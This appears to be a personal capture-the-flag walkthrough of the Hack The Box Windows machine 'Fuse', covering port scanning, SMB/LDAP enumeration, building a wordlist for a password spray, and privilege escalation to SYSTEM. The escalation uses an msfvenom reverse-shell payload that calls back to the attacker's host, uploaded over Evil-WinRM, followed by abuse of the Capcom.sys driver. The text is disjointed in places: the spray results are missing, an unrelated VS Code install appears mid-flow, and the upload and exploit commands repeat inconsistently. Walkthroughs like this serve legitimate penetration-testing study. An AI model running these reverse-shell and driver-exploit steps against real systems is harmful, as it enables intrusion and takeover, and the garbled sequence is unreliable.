Fuse

Windows : Medium

Password spray attack, Windows API, Windows Privilege Escalation, WinRM.

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.193  

53/tcp   open  domain       Simple DNS Plus

80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).

88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 09:50:13Z)

135/tcp  open  msrpc        Microsoft Windows RPC

139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn

389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)

445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0

636/tcp  open  tcpwrapped

3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)

3269/tcp open  tcpwrapped

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2024-01-22T01:50:23-08:00
|_clock-skew: mean: 2h52m59s, deviation: 4h37m09s, median: 12m58s
| smb2-time: 
|   date: 2024-01-22T09:50:25
|_  start_date: 2024-01-22T09:03:33
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.193    

88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.193

53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 09:55:07Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  msrpc        Microsoft Windows RPC
49697/tcp open  msrpc        Microsoft Windows RPC
49714/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h52m58s, deviation: 4h37m08s, median: 12m57s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2024-01-22T01:55:58-08:00
| smb2-time: 
|   date: 2024-01-22T09:55:59
|_  start_date: 2024-01-22T09:03:33

nmap found twenty open TCP ports, looking like a Windows domain controller The LDAP script identified a domain, fabricorp.local. The SMB script identified the OS as Windows Server 2016 Standard 14393, which matches with the IIS version of 10.

Enumeration: SMB Port 139/445/tcp

crackmapexec confirms the OS and domain:

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.10.193
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)

smbmap shows that null auth doesn’t allow access:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.193

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.193 -u null

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)

I’m able to connect with rpcclient, but don’t have permissions to access anything:

Enumeration: MSRPC Port 135/tcp RPC - TCP 445

I’m able to connect with rpcclient, but don’t have permissions to access anything:

┌──(kali💀kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.193
rpcclient $> enumdomusers 
result was NT_STATUS_ACCESS_DENIEDv

Enumeration: LDAP - TCP 389

I’ll use ldapsearch to confirm the base domain of fabricorp.local with -s base namingcontexts:

┌──(kali💀kali)-[~]
└─$ ldapsearch -h 10.10.10.193 -x -s base namingcontexts

Looks like I need creds to get deeper:

┌──(kali💀kali)-[~]
└─$ ldapsearch -h 10.10.10.193 -x -b "DC=fabricorp,DC=local"

Shell as svc-print

Spray for Password: At this point, I don’t have a lot of options without credentials. I do have a handful of user names from the these printer logs. The logs are also potentially a good source of target specific words that might be used as a password. I’ll use them to build a wordlist and try to spray that against SMB to see if I can get anything.

Build Wordlist: I’ll create a wordlist from the webpage using cewl. The --with-numbers flag is a good one to use, especially here:

┌──(kali💀kali)-[~/Desktop]
└─$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > wordlist

Because I didn’t specify a --depth, it will go two links away from the root page, which should be enough to get everything I want.

Privesc: svc-print –> SYSTEM

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Generate Payload: I could compile my own payload since I’ve already got Visual Studio open, but I’ll opt for a simple msfvenom payload. I’ll use windows/x64/shell_reverse_tcp to get a reverse shell I can handle with nc:

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.17 LPORT=443 -f exe -o rev.exe

Now I’ll upload the two executables:

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> ls

*Evil-WinRM* PS C:\programdata> upload rev.exe
Info: Uploading /home/kali/Desktop/rev.exe to C:\programdata\rev.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> ls
    Directory: C:\programdata
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/29/2020   5:25 PM                Hewlett-Packard
d---s-         6/1/2020   3:18 AM                Microsoft
d-----        5/29/2020   4:46 PM                Package Cache
d-----        5/26/2020  10:36 PM                regid.1991-06.com.microsoft
d-----        7/16/2016   6:18 AM                SoftwareDistribution
d-----       11/20/2016   6:19 PM                USOPrivate
d-----       11/20/2016   6:19 PM                USOShared
d-----        5/29/2020   4:46 PM                VMware
-a----        1/22/2024   5:38 AM           7168 rev.exe
┌──(kali💀kali)-[~]
└─$ cd Downloads
                                                                                                 
┌──(kali💀kali)-[~/Downloads]
└─$ ls                                                                                   
 code_1.85.2-1705561292_amd64.deb

┌──(kali💀kali)-[~/Downloads]
└─$ sudo apt install ./code_1.85.2-1705561292_amd64.deb

ExploitCapcom This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through IOCTL and to execute an arbitrary user supplied function pointer with disabling SMEP. This exploit simply abuses the feature to perform token stealing to get the SYSTEM privileges, and then launches the command prompt with the elevated privilege.

*Evil-WinRM* PS C:\programdata> upload /root/Downloads/Capcom.sys .
upload /root/Downloads/ExploitCapcom.exe .

upload C:\Users\Administrator\Desktop\ExploitCapcom.exe

.\eoploaddriver.cpp System\CurrentControlSet\MyService C:\programdata\capcom.sys
.\ExploitCapcom.exe

.\EoPLoadDriver.exe System\CurrentControlSet\CapcomService c:\tmp-pers\Capcom.sys
.\ExploitCapcom2.exe
PreviousMonteverdeNextScrambled

Last updated